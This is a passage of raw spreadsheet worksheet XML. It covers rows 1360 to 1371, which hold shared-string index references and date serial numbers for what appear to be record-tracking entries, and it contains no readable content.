      </c>
      <c r="AO1360" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1360" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1360" s="24">
        <v>46002.3962152778</v>
      </c>
      <c r="AR1360" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1360" s="23"/>
      <c r="AT1360" s="23"/>
      <c r="AU1360" s="23"/>
    </row>
    <row r="1361" s="1" customFormat="1" spans="1:47">
      <c r="A1361" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1361" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1361" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1361" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1361" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1361" s="23" t="s">
        <v>10773</v>
      </c>
      <c r="G1361" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1361" s="23"/>
      <c r="I1361" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1361" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1361" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1361" s="24">
        <v>46002.3692361111</v>
      </c>
      <c r="M1361" s="24">
        <v>46002.3692361111</v>
      </c>
      <c r="N1361" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1361" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1361" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1361" s="23"/>
      <c r="R1361" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S1361" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1361" s="23"/>
      <c r="U1361" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1361" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1361" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1361" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1361" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1361" s="24">
        <v>46002.3701157407</v>
      </c>
      <c r="AA1361" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1361" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1361" s="23"/>
      <c r="AD1361" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1361" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1361" s="23"/>
      <c r="AG1361" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1361" s="24">
        <v>46002.370162037</v>
      </c>
      <c r="AI1361" s="23"/>
      <c r="AJ1361" s="23"/>
      <c r="AK1361" s="23"/>
      <c r="AL1361" s="23"/>
      <c r="AM1361" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1361" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1361" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1361" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1361" s="24">
        <v>46002.3909490741</v>
      </c>
      <c r="AR1361" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1361" s="23"/>
      <c r="AT1361" s="23"/>
      <c r="AU1361" s="23"/>
    </row>
    <row r="1362" s="1" customFormat="1" spans="1:47">
      <c r="A1362" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1362" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1362" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1362" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1362" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1362" s="23" t="s">
        <v>10774</v>
      </c>
      <c r="G1362" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1362" s="23"/>
      <c r="I1362" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1362" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1362" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1362" s="24">
        <v>46002.3661111111</v>
      </c>
      <c r="M1362" s="24">
        <v>46002.3661111111</v>
      </c>
      <c r="N1362" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1362" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1362" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1362" s="23"/>
      <c r="R1362" s="23" t="s">
        <v>10733</v>
      </c>
      <c r="S1362" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1362" s="23"/>
      <c r="U1362" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1362" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1362" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1362" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1362" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1362" s="24">
        <v>46002.3669907407</v>
      </c>
      <c r="AA1362" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1362" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1362" s="23"/>
      <c r="AD1362" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1362" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1362" s="23"/>
      <c r="AG1362" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1362" s="24">
        <v>46002.367025463</v>
      </c>
      <c r="AI1362" s="23"/>
      <c r="AJ1362" s="23"/>
      <c r="AK1362" s="23"/>
      <c r="AL1362" s="23"/>
      <c r="AM1362" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1362" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1362" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1362" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1362" s="24">
        <v>46002.3878240741</v>
      </c>
      <c r="AR1362" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1362" s="23"/>
      <c r="AT1362" s="23"/>
      <c r="AU1362" s="23"/>
    </row>
    <row r="1363" s="1" customFormat="1" spans="1:47">
      <c r="A1363" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1363" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1363" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1363" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1363" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1363" s="23" t="s">
        <v>10775</v>
      </c>
      <c r="G1363" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1363" s="23"/>
      <c r="I1363" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1363" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1363" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1363" s="24">
        <v>46002.3471296296</v>
      </c>
      <c r="M1363" s="24">
        <v>46002.3471296296</v>
      </c>
      <c r="N1363" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1363" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1363" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1363" s="23"/>
      <c r="R1363" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1363" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1363" s="23"/>
      <c r="U1363" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1363" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1363" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1363" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1363" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1363" s="24">
        <v>46002.3480439815</v>
      </c>
      <c r="AA1363" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1363" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1363" s="23"/>
      <c r="AD1363" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1363" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1363" s="23"/>
      <c r="AG1363" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1363" s="24">
        <v>46002.3480555556</v>
      </c>
      <c r="AI1363" s="23"/>
      <c r="AJ1363" s="23"/>
      <c r="AK1363" s="23"/>
      <c r="AL1363" s="23"/>
      <c r="AM1363" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1363" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1363" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1363" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1363" s="24">
        <v>46002.3688773148</v>
      </c>
      <c r="AR1363" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1363" s="23"/>
      <c r="AT1363" s="23"/>
      <c r="AU1363" s="23"/>
    </row>
    <row r="1364" s="1" customFormat="1" spans="1:47">
      <c r="A1364" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1364" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1364" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1364" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1364" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1364" s="23" t="s">
        <v>10776</v>
      </c>
      <c r="G1364" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1364" s="23"/>
      <c r="I1364" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1364" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1364" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1364" s="24">
        <v>46001.6828472222</v>
      </c>
      <c r="M1364" s="24">
        <v>46001.6828472222</v>
      </c>
      <c r="N1364" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O1364" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1364" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1364" s="23"/>
      <c r="R1364" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S1364" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1364" s="23"/>
      <c r="U1364" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1364" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1364" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1364" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1364" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1364" s="24">
        <v>46001.6837037037</v>
      </c>
      <c r="AA1364" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1364" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1364" s="23"/>
      <c r="AD1364" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1364" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1364" s="23"/>
      <c r="AG1364" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1364" s="24">
        <v>46001.6837384259</v>
      </c>
      <c r="AI1364" s="23"/>
      <c r="AJ1364" s="23"/>
      <c r="AK1364" s="23"/>
      <c r="AL1364" s="23"/>
      <c r="AM1364" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1364" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1364" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1364" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1364" s="24">
        <v>46001.704537037</v>
      </c>
      <c r="AR1364" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1364" s="23"/>
      <c r="AT1364" s="23"/>
      <c r="AU1364" s="23"/>
    </row>
    <row r="1365" s="1" customFormat="1" spans="1:47">
      <c r="A1365" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1365" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1365" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1365" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1365" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1365" s="23" t="s">
        <v>10777</v>
      </c>
      <c r="G1365" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1365" s="23"/>
      <c r="I1365" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1365" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1365" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1365" s="24">
        <v>46001.5631481481</v>
      </c>
      <c r="M1365" s="24">
        <v>46001.6747337963</v>
      </c>
      <c r="N1365" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1365" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1365" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1365" s="23"/>
      <c r="R1365" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S1365" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1365" s="23"/>
      <c r="U1365" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1365" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1365" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1365" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1365" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1365" s="24">
        <v>46001.5641319444</v>
      </c>
      <c r="AA1365" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1365" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1365" s="23"/>
      <c r="AD1365" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1365" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1365" s="23"/>
      <c r="AG1365" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1365" s="24">
        <v>46001.5641666667</v>
      </c>
      <c r="AI1365" s="23"/>
      <c r="AJ1365" s="23"/>
      <c r="AK1365" s="23"/>
      <c r="AL1365" s="23"/>
      <c r="AM1365" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1365" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1365" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1365" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1365" s="24">
        <v>46001.5849652778</v>
      </c>
      <c r="AR1365" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1365" s="23"/>
      <c r="AT1365" s="23"/>
      <c r="AU1365" s="23"/>
    </row>
    <row r="1366" s="1" customFormat="1" spans="1:47">
      <c r="A1366" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1366" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1366" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1366" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1366" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1366" s="23" t="s">
        <v>10778</v>
      </c>
      <c r="G1366" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1366" s="23"/>
      <c r="I1366" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1366" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1366" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1366" s="24">
        <v>46001.6146759259</v>
      </c>
      <c r="M1366" s="24">
        <v>46001.6146759259</v>
      </c>
      <c r="N1366" s="23" t="s">
        <v>9807</v>
      </c>
      <c r="O1366" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1366" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1366" s="23"/>
      <c r="R1366" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1366" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1366" s="23"/>
      <c r="U1366" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1366" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1366" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1366" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1366" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1366" s="24">
        <v>46001.6156365741</v>
      </c>
      <c r="AA1366" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1366" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1366" s="23"/>
      <c r="AD1366" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1366" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1366" s="23"/>
      <c r="AG1366" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1366" s="24">
        <v>46001.6156597222</v>
      </c>
      <c r="AI1366" s="23"/>
      <c r="AJ1366" s="23"/>
      <c r="AK1366" s="23"/>
      <c r="AL1366" s="23"/>
      <c r="AM1366" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1366" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1366" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1366" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1366" s="24">
        <v>46001.6364699074</v>
      </c>
      <c r="AR1366" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1366" s="23"/>
      <c r="AT1366" s="23"/>
      <c r="AU1366" s="23"/>
    </row>
    <row r="1367" s="1" customFormat="1" spans="1:47">
      <c r="A1367" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1367" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1367" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1367" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1367" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1367" s="23" t="s">
        <v>10779</v>
      </c>
      <c r="G1367" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1367" s="23"/>
      <c r="I1367" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1367" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1367" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1367" s="24">
        <v>46001.4088425926</v>
      </c>
      <c r="M1367" s="24">
        <v>46001.4088425926</v>
      </c>
      <c r="N1367" s="23" t="s">
        <v>8805</v>
      </c>
      <c r="O1367" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1367" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1367" s="23"/>
      <c r="R1367" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1367" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1367" s="23"/>
      <c r="U1367" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1367" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1367" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1367" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1367" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1367" s="24">
        <v>46001.4095949074</v>
      </c>
      <c r="AA1367" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1367" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1367" s="23"/>
      <c r="AD1367" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1367" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1367" s="23"/>
      <c r="AG1367" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1367" s="24">
        <v>46001.4096180556</v>
      </c>
      <c r="AI1367" s="23"/>
      <c r="AJ1367" s="23"/>
      <c r="AK1367" s="23"/>
      <c r="AL1367" s="23"/>
      <c r="AM1367" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1367" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1367" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1367" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1367" s="24">
        <v>46001.4304282407</v>
      </c>
      <c r="AR1367" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1367" s="23"/>
      <c r="AT1367" s="23"/>
      <c r="AU1367" s="23"/>
    </row>
    <row r="1368" s="1" customFormat="1" spans="1:47">
      <c r="A1368" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1368" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1368" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1368" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1368" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1368" s="23" t="s">
        <v>10780</v>
      </c>
      <c r="G1368" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1368" s="23"/>
      <c r="I1368" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1368" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1368" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1368" s="24">
        <v>46001.4023958333</v>
      </c>
      <c r="M1368" s="24">
        <v>46001.4023958333</v>
      </c>
      <c r="N1368" s="23" t="s">
        <v>9807</v>
      </c>
      <c r="O1368" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1368" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1368" s="23"/>
      <c r="R1368" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1368" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1368" s="23"/>
      <c r="U1368" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1368" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1368" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1368" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1368" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1368" s="24">
        <v>46001.4027777778</v>
      </c>
      <c r="AA1368" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1368" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1368" s="23"/>
      <c r="AD1368" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1368" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1368" s="23"/>
      <c r="AG1368" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1368" s="24">
        <v>46001.4028240741</v>
      </c>
      <c r="AI1368" s="23"/>
      <c r="AJ1368" s="23"/>
      <c r="AK1368" s="23"/>
      <c r="AL1368" s="23"/>
      <c r="AM1368" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1368" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1368" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1368" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1368" s="24">
        <v>46001.4236111111</v>
      </c>
      <c r="AR1368" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1368" s="23"/>
      <c r="AT1368" s="23"/>
      <c r="AU1368" s="23"/>
    </row>
    <row r="1369" s="1" customFormat="1" spans="1:47">
      <c r="A1369" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1369" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1369" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1369" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1369" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1369" s="23" t="s">
        <v>10781</v>
      </c>
      <c r="G1369" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1369" s="23"/>
      <c r="I1369" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1369" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1369" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1369" s="24">
        <v>46001.3769791667</v>
      </c>
      <c r="M1369" s="24">
        <v>46001.3769791667</v>
      </c>
      <c r="N1369" s="23" t="s">
        <v>10782</v>
      </c>
      <c r="O1369" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1369" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1369" s="23"/>
      <c r="R1369" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1369" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1369" s="23"/>
      <c r="U1369" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1369" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1369" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1369" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1369" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1369" s="24">
        <v>46001.3777199074</v>
      </c>
      <c r="AA1369" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1369" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1369" s="23"/>
      <c r="AD1369" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1369" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1369" s="23"/>
      <c r="AG1369" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1369" s="24">
        <v>46001.3777430556</v>
      </c>
      <c r="AI1369" s="23"/>
      <c r="AJ1369" s="23"/>
      <c r="AK1369" s="23"/>
      <c r="AL1369" s="23"/>
      <c r="AM1369" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1369" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1369" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1369" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1369" s="24">
        <v>46001.3985532407</v>
      </c>
      <c r="AR1369" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1369" s="23"/>
      <c r="AT1369" s="23"/>
      <c r="AU1369" s="23"/>
    </row>
    <row r="1370" s="1" customFormat="1" spans="1:47">
      <c r="A1370" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1370" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1370" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1370" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1370" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1370" s="23" t="s">
        <v>10783</v>
      </c>
      <c r="G1370" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1370" s="23"/>
      <c r="I1370" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1370" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1370" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1370" s="24">
        <v>46000.735162037</v>
      </c>
      <c r="M1370" s="24">
        <v>46000.735162037</v>
      </c>
      <c r="N1370" s="23" t="s">
        <v>10628</v>
      </c>
      <c r="O1370" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1370" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1370" s="23"/>
      <c r="R1370" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1370" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1370" s="23"/>
      <c r="U1370" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1370" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1370" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1370" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1370" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1370" s="24">
        <v>46000.7359259259</v>
      </c>
      <c r="AA1370" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1370" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1370" s="23"/>
      <c r="AD1370" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1370" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1370" s="23"/>
      <c r="AG1370" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1370" s="24">
        <v>46000.7359606481</v>
      </c>
      <c r="AI1370" s="23"/>
      <c r="AJ1370" s="23"/>
      <c r="AK1370" s="23"/>
      <c r="AL1370" s="23"/>
      <c r="AM1370" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1370" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1370" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1370" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1370" s="24">
        <v>46000.7567592593</v>
      </c>
      <c r="AR1370" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1370" s="23"/>
      <c r="AT1370" s="23"/>
      <c r="AU1370" s="23"/>
    </row>
    <row r="1371" s="1" customFormat="1" spans="1:47">
      <c r="A1371" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1371" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1371" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1371" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1371" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1371" s="23" t="s">
        <v>10784</v>
      </c>
      <c r="G1371" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1371" s="23"/>
      <c r="I1371" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1371" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1371" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1371" s="24">
        <v>46000.6850347222</v>
      </c>
      <c r="M1371" s="24">
        <v>46000.6850347222</v>
      </c>
      <c r="N1371" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1371" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1371" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1371" s="23"/>
      <c r="R1371" s="23" t="s">
        <v>10785</v>
      </c>
      <c r="S1371" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1371" s="23"/>
      <c r="U1371" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1371" s="23" t="s">
        <v>8388</v>
      </c>
